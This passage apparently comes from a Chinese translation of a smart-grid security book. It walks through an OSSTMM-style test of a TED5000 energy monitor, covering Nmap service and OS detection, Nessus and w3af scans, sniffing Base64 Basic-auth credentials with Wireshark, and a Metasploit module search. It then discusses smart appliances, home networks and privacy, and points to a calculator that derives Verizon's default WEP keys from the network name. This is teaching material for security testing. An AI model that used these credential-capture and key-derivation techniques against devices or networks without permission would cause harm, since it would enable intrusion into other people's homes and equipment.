UDP 端口上运行的服务。比如, 在端口扫描模块中,我们得知 TED5000 智能设备在端口80和443上运行着服 务。由于这些端口最常见的是和Web 服务相关,于是服务识别和系统识别模块试 图判断出什么样的Web 服务器(如 i.e.Apache 或者是 IIS)正运行在什么样的操 作系统上(红帽 Linux 或者是微软 Windows 2008 R2)。 通过增加几个新选项,Nmap 可以用来识别目标设备上的服务和操作系统。 既然只有 TCP 端口响应,那么我们可以选用-sS 选项而不是-sU 选项。这些新的 选项是: ● -sV- 这个选项告诉 Nmap 对运行在开放端口上的服务进行版本检测 ● -p21-25,80,443-这个选项告诉 Nmap 扫 描 TCP 21 端 口(FTP) 、22(SSH) 、23(Telnet) 、24 (任何私有邮件系统)、25(SMTP) 、80(HTTP) 和 443(HTTPS) 。 由于仅端口80和443对我们在端口扫描模块中的初始 TCP 端口扫描作出了响应,我们要求 Nmap 查询 TCP 端口21到25,以便 识别出关闭的端口。当执行操作系统的识别时,Nmap 获得响应并把它们 和一个存储已知响应的数据库做比较。开放的和关闭的响应都会用到,因 此通过让Nmap 评测 TCP 端口21 到25的关闭的响应,我们就可以提高 操作系统被识别出的可能性 ●-O- 这个选项告诉Nmap 根据前面提到的要扫描的 TCP 端口的响应,识别 目标的操作系统 图13.7显示的是我们的Nmap 版本扫描的结果。从中你可以看出,Nmap 不 能识别运行在TCP 端口80或 TCP 端口443的服务。这是因为在其数据库里没 有对TED 5000 响应的签名。 同样地,Nmap 也不能识别运行在目标设备上的操作系统。尽管这看上去像 是在浪费时间,但这是枚举你目标的有用一步。并且,在漏洞研究和验证模块要用 到的Nessus 也可以识别运行的服务和操作系统。 13.2.4 漏洞研究和验证 ISECOM 的 OSSTMM 的过程安全测试一章的漏洞研究和验证模块的目的是 识别运行在TED5000 上的服务中的漏洞。这个模块和下面要讨论的因特网应用 测试模块有许多相同的基本目标 。 不过 , 这个模块关注的是识别那些网络可达的服务中的漏洞,而因特网应用测试模块关注的是识别传统上被称为Web 应用中的 漏洞。 识别目标系统存在的漏洞的过程包括手动测试和自动测试。由于 Web 服务 是运行在 TED 5000上的仅有服务,在下一模块我们将会详细地介绍手动漏洞研 究和验证。 为了执行漏洞研究和验证,我们将使用 Nessus 漏洞扫描工具。尽管安装 Nessus 要比在 Nmap 中选择几个选项要花费更多时间,但真正使用Nessus 却非 常简单。如果你需要获得关于安装 Nessus 的更多帮助,Nessus 的文档提供了手 把手的指导,教你如何安装 Nessus 以及如何创建一个用户登录Web 界面。 注意 基于本模块的目的,我们使用的是Nessus 的4.2.2版本。Nessus4.2 之前的版 本包括一个执行漏洞测试的服务器和连接到服务器并发送指令的客户端。自从 版本4.2开始,Nessus 实现了一个 Web 接口,用来处理以前 Nessus 客户端执行 的工作。对于那些更喜欢客户端/服务器模式的用户来说,Nessus 4.2.2 也支持 Nessus 4 的客户端。不过,基于本书的目的,我们使用的是Nessus 4.2.2的 Web 客户端。 首先,我们登录到运行在 Ubuntu 10.04(Lucid Lynx)系统上的 Nessus 服务 器,如图13.8所示。图13.8表明在这个实验中要用到Nessus 的专业版。当为商 业应用使用Nessus 时 ,Nessus 专业版是必须的,在写本章的时候,该专业版需要 花费$1200从Tenable 获得。Tenable 也提供可以免费获得的个人使用许可证。你可以从www.nessus.org/products/professional-feed 获得更多有关 Nessus 的许可模式的信息。 在登录进 Nessus 后,要为目标 TED 5000 配置一个特定的扫描策略。扫描策 略是Nessus 用来执行漏洞扫描的配置。TED5000 智能设备的扫描策略是通过点 击屏幕上方的 Policies 创建的。图13.9显示了 TED 5000 智能设备扫描策略所采用的选项。 策略设置的一部分没有采用默认设置,下面解释了原因。这些设置是: ● 名字——这个设置仅仅用来作为此扫描策略的唯一标识。你可以把它设 置成任何你想要的值 ● 描述——这是你自己使用的可选设置。当你有多个扫描策略时,记住某个 策略是用来做什么的是不容易的 ● 保存基本信息——这个设置把你的扫描信息保存到 Nessus 服务器上。在 故障排除或当你在扫描过程中遇到问题时,这个信息是很有用的 ● 记录扫描细节到服务器——这个设置和保存基本信息设置相似,是把你的 扫描的细节记录到 Nessus 日志文件。这个信息在排除任何故障或监控你 的扫描的状态时也很有用(如果新的进度条不能正常工作) ● 端口扫描器——由于 TED 5000 只是对 TCP 端口有响应,我们需要取消 对其他扫描器的选择。Ping Host 设置被留下来是因为我们想确定在执 行漏洞扫描之前主机仍然存活 ● 端口扫描选项——我们将这个设置在 Nessus 中的默认端口值改成我们之 前在端口扫描模块里用Nmap 识别出的 TCP 端口值。减少扫描的端口数 量可以减少漏洞扫描的时间。只有当你用 Nmap 或其他端口扫描器执行 过端口扫描后,才更改这个设置,如果你想对全部的端口扫描,那么把这个 设置改为0-65535 一旦针对 TED5000 智能设备的扫描策略创建好了,只要点击顶部的“Scan”, 扫描就开始了。图13.10显示了对目标设备的 Nessus 扫描使用的设置。 虽然大部分设置是在扫描策略里完成的,在配置扫描时 也有一些选项要填。下面是 TED 5000 智能设备的 Nessus 扫描要用到的一些 设置: ● 名字——这个设置仅仅用来作为此次扫描的唯一标识。你可以把它设置 成任何你想要的值。注意这个是扫描完成后出现在 reports 面板下的报 告名 ● 类型——这个设置可以让你选择是现在就执行扫描还是以后再执行。基 于本次测试的目的,扫描需要立即执行 ● 策略——这个设置是Nessus 在执行扫描时要用到的扫描策略。前面在 Policies 面板下创建的 TED 5000 策略被选中 ● 扫描目标——这个设置要输入TED5000 智能设备的IP 地址。Nessus 也 可以处理网络段、主机名和 DNS 名。如果你有预编译好的目标列表,那你 可以用“目标文件”设置而不是“扫描目标”设置 一旦扫描配置好了,点击“开始扫描”按钮让Nessus 自动去做。图13.11 显示 了Nessus 的新建进度条。当 Nessus 执行漏洞测试时,会用完成的百分比及高危、 中危、低危漏洞的数量和开放的端口数更新扫描的状态。你会注意到 Nessus 在 TED5000 上仅仅识别出了两个开放端口,因为我们配置的 TED5000 的扫描策略 就是只测试 TCP 端口80和443。 Nessus 完成漏洞扫描后,该扫描就从 Scans 面板移到了 Reports 面板。要想 查看扫描结果,只要点击“Reports”, 双击你创建扫描时起的名字即可。 在对 TED 5000智能设备完成 Nessus 漏洞扫描后,查看结果可知 Nessus 并没有发现任何高危或中危漏洞。因此,需要用手动测试或者是自动的因特网应用 测试发现进入目标设备的入侵点。和漏洞研究和验证模块很像,ISECOM 的 OSSTMM 的因特网应用测试模块 的目的是识别目标设备的Web 应用和技术中存在的缺陷。为了完成这个目标,需 要使用手动和自动测试的组合。 需要用Web 浏览器对目标设备执行手动测试。下面的这些 Web 浏览器可以 被用作工具包的一部分: ● 微软 IE——只能用于微软的 Windows 操作系统,www.microsoft.com/windows/internet-explorer ● Google Chrome -可用于大多数操作系统(微软 Windows、苹果 OSX 和 Linux),www.google.com/chrome Mozilla Firefo) 可用于大多数操作系统(微软 Windows、苹果 OSX 和 Linux),www.getfirefox.com为了开始OSSTMM 的因特网应用测试模块的自动测试,我们先打开Google Chrome 的 Web 浏 览 器 并 输 入 TED 5000 智 能 设 备 的 URL,http://192.168.210.5。图13.13显示当试图访问TED5000 的 Web 接口时,需要输入密 码。为了能访问TED5000 的 Web 界面,我们必须获得有效的凭证或是暴力破解 密码。在下面的密码破解模块我们会介绍这两种用于获得针对TED 5000 Web界 面的凭证的方法。为了继续本章,假定我们已经获得了针对 TED5000 Web界面 的凭证。 现在既然我们已经可以访问TED5000 的 Web 界面,我们需要了解它所使用 的技术。图13.14显示了TED5000 的主页,在这里用户可以找到他们所需要的 大部分信息。 第一眼看上去,TED 5000使用的像是 Adobe 的 Flash 技术提供信息,但仔细 些观察,我们发现事实不是这样的。用Google Chrome 的 Inspect Element 功能 (在你想查看的元素上右击),我们得知 TED5000 用的是JavaScript 展示信息。 实时的KW 使用读数3.043KW 是通过 HTML 代码提供的而不是 最初设想的 Adobe Flash。 尽管有可以测试 Adobe Flash Web 应用的方法,比如 SWF 扫 描(http://h30406.www3.hp.com/campaigns/2009/wwcampaign/1-5TUVE/index.php?key= swf),TED5000使JavaScript 的事实让我们可以使用更常用的 Web 应用攻击和审 计框架(w3af) 工具。 工具 Andres Riancho的 Web 应用攻击和审计框架,或简称 w3af,是一个开源的 Web 应用 工具,提供了可以识别Web 应用漏洞的框架。[W3af 也提供了攻击或入侵测试和发 现漏洞的能力。可以利用该工具执行自动和手动的漏洞识别和漏洞利用,该工具自 带了许多预配置好的扫描策略,包括开源Web 应用安全计划(OWASP) 的 Top10。你 可以从 http://w3af.sourceforge net 上学习更多 w3af 的知识并下载一份。 现在既然我们已经知道了 TED5000 的 Web 界面使用的技术,我们可以利用 w3af 在目标设备的Web 服务器上抓取网页数据。抓取 Web 服务器网页数据的目标是创建一份网站上可用页面的索引然后单独测试它们的漏洞。幸运的是,w3af 包含一个叫做 Sitemap 的预配置的扫描策略,可以用来抓取目标网站数据。 一旦我们使用w3af 的 Sitemap 扫描策略对 TED 5000 智能设备完成了扫描, 我们就可以查看结果寻找需要进一步手动检查的页面。由于 TED5000 的页面本 身大多数都是静态的,因此对由 Sitemap 策略扫描识别出的页面进行手动评估没 有发现漏洞。 使用w3af 执行因特网应用测试的下一步是利用内置的OWASP Top 10 扫描 策略。如果你还记得前一章的内容,我们讨论过在识别漏洞时,OWASP Top 10 是非常棒的可用工具。因此,本书的作者很高兴 w3af 能把 OWASP Top 10 包含 进来。为了提高效率,可以先完成 Sitemap 策略扫描,然后一边对识别出的页 面进行手动检查一边让w3af 执行 OWASP Top 10 策略扫描。 当 w3af执行 OWASP Top 10 策略扫描时,你会看到一个进度条还有日志信 息,如图13.18所示。W3af 会把识别出的漏洞记录下来,不但记在如图13.19所 示的 Results 部分,也记在 Log 部分。 一旦扫描完成,我们就可以通过点击w3af 的 Results 面板查看结果。在查看 结果时,我们注意到一个醒目的结果,在图13.19里已标注出来。W3af 识别出了 TED5000 智能设备上存在的一个潜在的缓冲区溢出漏洞,因为这台 Web 服务器 都是用HTTP的414响应代码和“Request-URItoolong”消息对许多请求作出回 应。乍看上去,这个漏洞像是攻击者希望找到的突破类型。不过,我们需要验证它 的存在。 为了验证 TED5000 智能设备的Web 接口中可能存在的缓冲区溢出漏洞,我 们研究了414 Request-URI Too Long这个 Web 服务器消息。我们研究的结果是 这是个误报。不过,这个潜在的漏洞展示了攻击者如何利用ISECOM 的 OSST- MM 的过程安全测试一章的因特网应用测试模块攻击智能设备。 13.2.6 密 码 破 解 ISECOM 的 OSSTMM 的密码破解模块的目的是获得能进入受密码保护的目标的凭证。前面在因特网应用测试模块提到过,TED 5000 智能设备的 Web 界面 被登录密码所保护。图13.13显示了这种情况。和我们识别TED5000 的 IP 地址 的方式很像,我们可以通过被动的和主动的攻击获得针对 TED 5000 Web接口的 有效凭证。在本章,我们将使用 Wireshark 嗅探工具实施被动攻击,用 Bruter 暴力 破解密码工具实行主动攻击。 在正确的情形下,利用 Wireshark 获得进入网站或其他网络服务的登录凭证是很有效的。和在网络调查模块一样,为了让Wireshark 能发挥作用,你必须和登 录到目标设备的客户端或者目标本身在一个网络内。在交换网络情形下,即使在 同一个网络内,你可能也无法查看包含登录凭证的数据包。不过,嗅探的理想网络 是无线网络,比如飞机场或咖啡店。同样地,要想让被动攻击有效,登录凭证必须 以不加密的形式传送,或者用存在已知缺陷的加密方案加密。如图13.13所示,给 试图访问TED 5000 Web界面的用户的验证提示可以用基本验证中的弱 Base64 编码混淆。现在让我们看一 下我们如何利用Wireshark 工具获得进入 TED 5000 Web 界面的登录凭证。 利 用 Wireshark 的过滤功能,我们首先过滤我们捕获的包,只显示传向 TED 5000的IP 地址 192.168.210.5或从这个地址传出的包。可以通过设置一个过滤 器“ip.addr==192.168.210.5 ” 实现。然后,我们浏览数据包从中找寻 HTTP 协 议数据包。你可以再设置一个只显示传向或从 TED 5000智能设备传出的 HTTP 协议数据包的过滤器,不过考虑到我们捕获的包不大,我们可以简单地用分类功能 然后手动查看 HTTP 协议数据包。 Wireshark 的信息面板清楚地显示了此数据包确实 包含验证信息。现在我们已经知道了用Base64 编码的登录信息和密码,你可以用你最喜欢的编码/解码器获得登录信息和密码的明文文本。 13.2.7 拒绝服务测试 ISECOM 的 OSSTMM 的过程安全测试一章的拒绝服务测试模块的目的是判 断目标设备是否易受拒绝服务攻击。尽管拒绝服务攻击对智能电表的影响要比智 能设备更大,但考虑到消费者使用智能设备的方式, 一次成功的拒绝服务攻击也可 能造成很严重的影响(比如 blackout) 。 不过,对我们的目标智能设备TED5000 的 拒绝服务攻击只是让设备失去能源监控的能力。 不管拒绝服务攻击的影响如何,漏洞扫描人员提供了大量的插件用于检查此类型的 漏洞。不过,考虑到运行这些插件可能会导致目标无响应,因此必须显式地启用它们。这 个可以通过在你的Nessus扫描策略里去掉“Safe Checks”设置实现,如图13.9所示。 如果你打算对你的目标智能设备执行拒绝服务漏洞检查,你需要确定你清楚其 后果。否则,也许最终你会使设备不可用或丢失有价值的数据。你自己要考虑清楚。 13.2.8 漏洞利用测试 在本章中,我们利用的ISECOM 的 OSSTMM 的过程安全测试一章的最后一 个模块是漏洞利用测试模块。由于 Nessus 没有识别出任何可以利用的漏洞,并且 那个 w3af 识别的潜在漏洞是误报,那就没有多少理由攻击TED 5000 智能设备 了。不过,我们决定运行Metasploit 工具针对 TED 5000智能设备提供的所有可 用攻击程序,从而展示如何执行漏洞利用测试。从之前的 Nessus 结果中的一个可 用细节得知,TED 5000 智能设备运行的是 BSD操作系统。 为了判断 Metasploit 针对某具体服务如 Apache 包含的攻击程序,打开 Meta- sploit 控制台并输入“search apache”。图13.24显示了 Apache 服务可用的辅助模 块、漏洞利用程序和附加工具。 通过查看结果,我们得知Metasploit 仅仅在 UNIX 操作系统上包含了两个可 被漏洞利用程序利用的 Apache 漏洞。然而,这两个漏洞都是因为 TED5000 智能设备没有安装或使用插件。到目前为止,显然 TED 5000智能设备不会通过漏洞 利用测试被破坏。不过,漏洞利用测试是OSSTMM 的顶端部分,利用漏洞的成功 攻击使得攻击者可以执行后续的攻击,直到达到他们的最终目的。 13.3 总结 在第12章,“攻击智能电表”中,我们讨论了用于执行安全测试的常用方法体 系。在这一章里,我们利用ISECOM 的 OSSTMM 方法攻击智能设备。和智能电 表一样,智能设备也易受那些能接近它们的人的攻击。然而,和智能电表不同,现 在智能设备的获取是普遍的。尽管对智能设备的成功攻击产生的影响明显没有对 智能电表的成功攻击产生的影响大,但这并不意味着智能设备制造商不用对他们 的设备执行安全测试。如果某智能设备变得无处不在,它们肯定会被攻击者和好 奇的消费者盯上。如果这些智能设备以前没有进行过安全测试并且也没有修复漏 洞,智能设备的用户将会碰到他们所不期望的后果。 接 下 来 呢 ? 由于世界各地的倡议推行智能电网基础设施获得加速发展。最近几年尤其是 致力于应用智能电表和它们所支持的高级量测体系(advanced metering infra- structure,AMI) 的项目显著增加。英国能源零售协会(Energy Retail Association, www.energy-retail.org.uk/smartmeters.html) 下辖的智能电表工程小组给出了 一张全世界现有的有关高级量测体系和自动抄表系统(AMR) 项目的分布图。有许多和智能电网相关的项目正在计划中或在 实现的过程中,其中大部分和智能电表的应用有关。2010年3月,爱迪生基金会 估计目前在美国使用的智能电表有6千万。2]因此如果你住在美国,你家很可能已 经安装了智能电表。 4.2 消费者应该期待什么? 消费者已经被承诺过智能电网会极大地改善他们的日常生活。数额更少的 账单、更少更短时间的断电和更直接地获悉能源使用信息只是给消费者承诺中 的一部分。为了实现这些承诺, 一些新的技术将会涌入消费者的家里和商业领 域包括 : ● 智 能 设 备 ● 智能电表 ● 家庭局域网 ● 电动车 ● 个人电厂 ● 智能设备 对于消费者,更常见的智能电网的组成部分包括放在人们厨房、客厅、卧室 和办公室里的智能设备。机械设备现在把以前用于个人计算机和办公室工作站的数字产品也包含了进来。家用和商用电器现在有内置 的处理和通信功能,易于使用并且可以提高能源的使用 效率。 1)家用智能电器 除了在第13章,“攻击智能设备”提到的智能设备外, 消费者期望他们的传统设备,如冰箱、洗碗机、加热器、洗衣 机烘干机和热水器都能有同样的智能设备与之对应。例 如,通用电气(General Electric,GE)的智能热水器如 图14.3所示。GE 的智能热水器可以连接到智能电表上, 因此公用事业公司或消费者可以把它的操作模式调到省电 模式上,从而减少电的消耗。这样设计可以减少消费者的 开销,并且可以在用电高峰期阻止断电的发生。 其他智能电器,如洗碗机和空调,也会有类似的网络接 口,使得消费者和公用事业公司可以通过智能电表或第三 方接口管理他们的能源使用。可以大胆假设大部分新型电 器,从电源板到洗碗机,都会应用可以远程控制电器的通信 技术。有了这种新连接技术,消费者不论是在家里还是在 世界任何地方,都可以管理他们的家用电器。 注意 为什么一本关于安全的书讨论洗衣机和热水器?新的技术带来新的风险,在智能 电网的世界里,众多以前独立的设备会连接成一个信息网络。这种新的连接形式 的增加,使得设备可能会有遭受远程攻击的风险。网络中任何一个节点都应该被 考虑成一个潜在的攻击注入点。正因为这样,在智能电网中,甚至洗衣机和热水器 也需要合理保护。 2)商用智能电器 利用智能电网功能的新技术也会被引入到商业领域。运行成千上百台计算 机、交换机、路由器和其他网络设备的数据中心,备用电池组和供暖通风空调 (heating,ventilating,and air conditioning,HVAC)系统都需要大量的能源。因此,能源使用是一个公司预算中的极大组成部分。利用智能电网中可以获得详细 的能源使用信息这一点,数据中心应该可以识别出电力使用无效率的地方,从而减 少能源开销。能源部正在进行一项致力于提高数据中心冷却及发电、转电和配电 的效率的研究,该研究是能源智能数据中心(Energy Smart Data Center)项目的一 部分。关于这些工作的更多信息可以从http://esdc.pnl.gov获得。 设备管理也将受益于智能设备的远程管理功能。现在在许多大厦,当没人的 时候,灯都是在某个特定时间自动关闭,空调或加热器也是在长假内关闭。这些在 以前也许是复杂的操作,但智能设备使得这些操作仅仅是在Web 应用上点击几个 按钮就可以实现。 商业领域正尝试通过技术手段节约能源的使用,比如可以减少场景中物理服 务器数量的虚拟化技术。另外, 一些公司如惠普(Hewlett Packard,HP)开始出售 内置传感器的服务器,这些传感器可以检测能源浪费并提供补偿措施提高能源使用效率。 14.2.2 智能电表 就像在“发展历程”一节中提到的,全世界已经应用了上百万的智能电表,消费者应该期待这个趋势继续下去。从消费者的角度看,新的电表可以提供实时的能 源使用信息和对智能设备的有限控制。在不久的将来,随着更多的智能设备普及, 智能电表将成为消费者对大部分家用和商用设备的控制中心。 大家都认为,查看每个设备消耗的电量有助于消费者选择购买更省电的设 备,并且在设备不用时关掉它们。不幸的是,只是关掉设备并不能完全杜绝能源 浪费。大多数设备甚至在关机后或待机模式下也会消耗能源。在关机情况或待 机模式下这些设备使用的能源常被称为吸血鬼式能源浪费。举个例子, 一个普 通的等离子电视的吸血鬼式能源浪费被估计每年要花费消费者$165.00。 这些设备在待机模式下或在关机情况下,消耗的电量明显比正常使用时低。然而,平均每个美国家庭都有40台设备持续消耗电。 当这40台设备浪费的能源整合到一个美国人的身上,这数字 看上去就有分量了。考虑到美国有上百万的家庭,当这些设备不用时,每年都要消 耗上亿瓦的电。据估计百分之十的居民用电量是吸血鬼式能源浪费,意味着美 国人每年在浪费的电量上要花费4亿美元。 提示 在安全行业内一个常见的笑话是只有当一台计算机关机并被烧成小碎片时才安 全。许多人根据无数博客提供的这个建议,都会在日终时关闭他们的计算机。不 过可以再进一步,把计算机和新的智能设备的插头拔掉,消费者可以明显地降低能 源浪费,并且至少可以在几个小时内防止他们的电子产品被攻击。 1)可变的价格 在美国大多数消费者现在用固定的价格支付电费。因此,每千瓦时的价格 是固定的,他们的账单是通过用消耗的千瓦时乘以固定价格得到的。然而,公用 事业公司在批发市场上是按可变价格支付能源的,依据的是时间和当前需要。 智能电表可以让公用事业公司提供这种可变价格模式或者 time-of-use模式给消 费者。可变价格模式的产生是因为高峰时段问题,高峰时段是每天中对电网的 能源需求最高的时段。有两种策略可以用来处理在这些高峰时段内日益增长的 需求。第一种方式是建造更多的发电厂发更多电来满足高峰时段的需求。这种 方式显然花费高并且在非高峰时段时会造成显著浪费。预测在某给定时刻需要 多少能源几乎是不可能的。结果,电厂经常是供大于求。因此,当需求减少时,过 剩的能源就浪费了。把这些过剩的能源储存起来以备后用的技术正在研究中,并 且应该会在未来的智能电网中发挥重大作用,但是在这些大规模的电池被应用之前,这些能源都被浪费了。因此,建造更多的电厂只会增加在非高峰时段内的电源 浪费。 第二种方式是减少高峰时段内的需求。其中一种方法是劝说消费者在非高峰 时段内执行高耗能源的操作,比如使用洗碗机或干衣机。例如,消费者可以设定他 或她的智能洗碗机在凌晨2:00开启,此时对能源的需求较少,而不是在下午6:00 开启。 一些人可能会因为保护环境的原因而改变他们的洗碗习惯。然而,大多数人需要更进一步的激励措施来改变他们的习惯,最可行的措施是采用分时段价格。 如果消费者知道电在下午6:00的价格是凌晨2:00的两倍,那么消费者很可能就 会在凌晨2:00使用他们的洗碗机。 另外, 一些公用事业公司提供了节能计划,允许公用事业公司在高峰时段限制 某些电器。具体的做法是,如果消费者在高峰时段内关闭某些电器,如空调,公 用事业公司会提供给消费者金钱鼓励。公用事业公司通过向智能设备或智能恒温 器发送一条指令实现节能操作。幸运的是,智能设备或恒温器也会收到重新开启 的指令或者它们有内置的功能可以在一段设定的时间后自动重新开启。否则,在 持续的炎炎夏日,消费者恐怕会反对这些计划。 许多智能电网市场运动用分时段价格和节能计划作为使消费者相信智能电网 可以减少他们的账单的依据。当然,这些都依赖于消费者能接受新的设备、安排和 价格计划。对于那些接受新技术的消费者来说,网络威胁带来的风险将持续升级。 由于这些消费者开始更多地依赖互相连通的电器, 一次成功的网络攻击将会造成 更大的灾难。 14.2.3 家庭局域网 在消费者的家里和办公室需要组建一个通信网络,支持智能电表和智能设备 之间的通信。这个网络被称为家庭局域网(Home Area Network,HAN)。由于 HAN 的标准协议还在讨论和制定中,HAN 可能会有多种形式。 一些智能设备和智能电表被设计的是连接到消费者已有的家庭或办公室网络 上。这些设备要求消费者有宽带连接,可以在公用事业公司、第三方服务提供商和 智能电表设备之间传送数据和指令。例如,YelloStrom研发的智能电表可以利用消费者已有的宽带因特网连接,该智能电表已向消费者出售。尽管这样做可以免 去在家庭和变电站之间建无线网络的必要,但采用这种方法明显有安全风险。大 多数消费者的家庭局域网配置仍然不安全,尤其是无线网络,采用的是默认密码和 有已知缺陷的加密协议。 例如,Verizon FiOS的无线路由器默认配置的是有线等效(wired Equivalent Privacy,WEP) 加密。除了 WEP 具有许多已知缺陷外,Verizon FiOS 有时还采用 一个依据无线网络服务设定的标示符(service set identifier,SSID)的程序计算 WEP 密钥。尽管这种方法看上去比对每个 Verizon FiOS路由器都采用相同的 WEP 加密密钥要安全,但它并没有真正提高这些无线网络的安全。Verizon 采用 的算法是公开的,在生成密钥时没有加入随机数,而这是生成安全密钥的关键。结 果, 一些人已经开发出简单易用的 Verizon WEP密钥计算器。[对密钥生成算法 的描述和 JavaScript 版本的计算器可以从 http://xkyle.com/2009/03/03/veri- zon-fios-wireless-key-calculator/ 获得。该计算器只需要无线网络的 SSID 来计算 默认的 WEP 密钥。因此,攻击者只需要知道消费者的无线网络名就可以在几秒 钟内连接到消费者的无线网络。 警告 由消费者管理的网络不应该被认为是安全的,并且在公用事业网络和 HAN 之间 也不应该建立可信的关系。Verizon 的默认 WEP 计算器应该可以作为这个警告 的案例。很明显大多数消费者都不是安全专家, 一般来说他们也不会在合理保护 他们的家庭网络上花时间。以后的智能设备和应用应该自带默认的不需要用户配 置的安全控制,保护在 HAN 中传送的数据的机密性和完整性。 那么,谁该对 HAN 负责呢?如果智能设备和智能电表依赖于消费者的网络, 一旦消费者的网络被攻破了,是不是意味着公用事业公司或者第三方服务提供商 也被攻破了呢?如果是这样,这种破坏是否属于公用事业公司需要遵循的众多隐 私法律的范畴?这些问题的答案将是国家的司法制度在未来20年内要寻求的。 14.2.4 电动车辆 随着汽油价格的不断上涨,消费者可能会转向使用替代燃料的交通工具,代替 他们现有的燃烧汽油的交通工具。现在,电动车辆还不是很普及;不过, 一些公司 或者是已经推出了或者是正在研发插拔式电动车辆(plug-in electric vehicles, PEV) 包括: ● Nissan Leaf-http://nissanusa.com/leaf-electric-car ● Chevy Volt-www.chevrolet.com/pages/open/default/future/volt.do ● Tesla Roadster and Model S-www.teslamotors.com/ PEV 或者会成为在智能电网中存储过剩电力的解决方案,或者会在智能电网 中造成大规模的断电。和传统使用汽油的车辆相反,PEV 在大电瓶中存储电力作为燃料。对于使用 PEV 的国家来说,可能的受益就是在高峰时段,可以让智能电 网从 PEV 中提取电。[181方法是在非高峰时段,即供大于求时,给 PEV 的电瓶充 电。因此,提供的过剩的电能会被存储在 PEV 中,从而减少在非高峰时段的能源 浪费。 不幸的是,PEV 只在非高峰时段内需要充电仅仅是理想的情况。考虑更常见 的情况,PEV 在高峰时段也需要充电。在2007年,美国有超过254百万辆的注册 车辆。19]如果这254百万辆车里只有四分之一是 PEV, 那么对智能电网造成的负 担也是很严重的。数以百万计的 PEV 在高峰时段充电会给智能电网造成过多压 力,引起对智能电网的大规模分布式拒绝服务攻击(distributed denial of service, DDoS)。 14.2.5 个人电厂 乔治西屋的集中式发电理念已经开始向混合发电理念转变。尽管大型发电厂 依然存在并且可能在下一个世纪都会继续存在,但分布式发电技术已经成为许多 消费者的可行选择。相对便宜的太阳能板和风能生成器,加上政府给出的折扣机 制,已经影响了消费者开始在他们自己的家里安装发电装置。 在智能电网的理念中,消费者还可以把过剩的电卖给公用事业公司。把电卖 给公用事业公司的功能当然会吸引许多创业者;不过,也会吸引一些欺诈者,他们会企图操纵返回给公用事业公司的数据。 14.2.6 隐 私 面对智能电网的采用,消费者最担忧的问题之一是隐私。在第2章,“面向消 费者的安全威胁与影响”中我们讨论过,智能电表和智能设备会收集大量数据并通 过智能电网传送这些数据。对他们的信息的安全担忧可能会让一些人与电网隔 绝,但这应该是少数。更多数的是竭尽全力不让自己连到智能电网的人。例如,加 利福尼亚州贝克尔斯菲市的一个人就反抗 PG&.E 在他家安装智能电表。出于隐 私的考虑,他查看了现有的电表,然后向记者陈述如下:“如果他们出现,他们必须 先过我这一关才能安装它。这需要法院的传令和一队警员。需要有人阻止PG&.E 在这里的行动。”尽管这代表的是一种极端情况,但却给公用事业公司提了一个 警告,当公司的工人在人们家安装智能电表时,需要保护工人们的安全。 虽然还不至于到引发肢体冲突的极端,但其他的一些消费者和法律专家也认 为智能电表违背了美国宪法保障公民的隐私权的第四修正案。在第2章讨论过, 对智能电表的能源使用数据的分析可以让公用事业公司或其他任何可以访问这些 数据的机构判断出你在使用何种电器,并描绘出你在家的生活方式。加利福尼亚 的一些消费者认为这种行为是企业入侵,是对权利的损害。不过,政府机构也可 以查看你在家的活动,这同样也是违宪的。电子前沿基金会(EFF:Electronic Frontier Foundation,www.eff.org/)的 Attorney Lee Tien 说:“这是很清楚的,不管是不是依据宪法第4修正案,家庭的隐私是最重要的价值,”[20]并且“政府在没 有正当理由的情况下,是不应该侵入居民家内部的。然而当这些数据在你家之外 的地方自由扩散时,信息就不再位于受保护的范围内,你就开始有麻烦了。”[20]如 果出现人们确信他们的隐私被侵害的事件,公用事业公司和政府机构就会被起诉, 这会减缓甚至是阻碍智能电网技术的采用。 14.3 智能电网技术供应商应该期待什么? 技术供应商应该期待他们的产品和服务会开始蓬勃发展。不管是公用事业公 司还是消费者,都对能源行业投入了大量金钱、热情和好奇。公用事业公司需要从 技术供应商那里购买智能电表、网络设备和服务。 一些急性的消费者会立即把他 们现有的效率低的电器替换成新的智能电器,剩下的消费者会在他们的旧电器坏 了后再逐步替换他们的电器。 不过技术服务提供商也会面临质疑。在“消费者应该期待什么?”一节中,我们 讨论过一些消费者正抵制技术提供商的新设备。尽管其他的技术服务提供商正致 力于校验新设备的准确性,13]但当安全事故发生和消费者的隐私遭到破坏时,这 些新设备就会受到抨击。技术服务提供商需要加强他们产品的安全性能,才能平 息这些批评。 当一些消费者开始为试用新设备和减少他们的账单开销而兴奋时,其他一些 人却因为可以操作和入侵新的设备而兴奋。技术服务提供商应该考虑到人们会发 现他们设备的漏洞,近来的经验告诉我们漏洞在这些系统中暴露出来,不是会不会 发生的问题,而是什么时候发生的问题。与其看着这些人做敌对动作,还不如技术 提供商主动与这些人合作加快发现漏洞的速度。否则,技术提供商会因为他们与 安全团体的敌对关系而被诘责,进而演变成恶意攻击。 14.4 公用事业公司应该期待什么? 公用事业公司也被许诺智能电网会给他们的运作带来很大改善。新技术将有 助于公用事业公司减少能源浪费,更准确地计费,增强电网的稳定性,减少运作成 本。不过,这本书的问题是,智能电网是否会带来一个更安全的电网? 14.4.1 降低能源需求就是降低成本及加强安全 虽然政府激励措施可以抵消一部分成本,但公用事业公司要想实现智能电网 的目标首先应做大投资。不过,需要几十年才能见到成效。在“智能电表”一节中, 我们提到过,在美国百分之十的居民能源消耗是吸血鬼式能源浪费。如果使用更 有效率的电器并且消费者能自觉注意,这百分之十就可以消除,公用事业公司就可 以把一些老化的发电厂关闭,而不用在以后替换它们。关掉这些发电厂可以节省 公用事业公司的开销也可以消除保护这些发电厂的需要。因此,需要保护的设施和系统也会减少。 随着智能电表和公用事业公司之间双向通信方式的引入,去消费者家里和办 公室里实地操作的情况就显著减少了。去执行维护操作及其他一些任务还是需要 实地操作的;不过,公司工人应该不用再实地读取电表数据了。 减少实地操作的次数会为公用事业公司减少了运作成本。现在公用事业公司 在工人出去读电表需要的汽油和交通工具上花费了大量的钱,这也是公用事业公 司正快速应用AMI 的一个原因。实现AMI 涉及的双向通信功能当然会给公用事 业公司带来风险;不过,这样做也有一个潜在的安全受益。公用事业公司的工人不 必离开他们办公室的物理保护范围,更重要的是,他们不必把公司的存储敏感数据 的电子设备带出这个物理保护范围。因此,移动设备被偷窃的风险就降低了。 减少实地操作的次数也会加强工人们的安全,几十年来狗和其他宠物都让工 人们很头疼,工人们要面临来自消费者的各种威胁。像在“隐私”一节中讨论的,去 消费者家里拜访可能会置工人们于危险的境地。公用事业公司做的决定并不总是 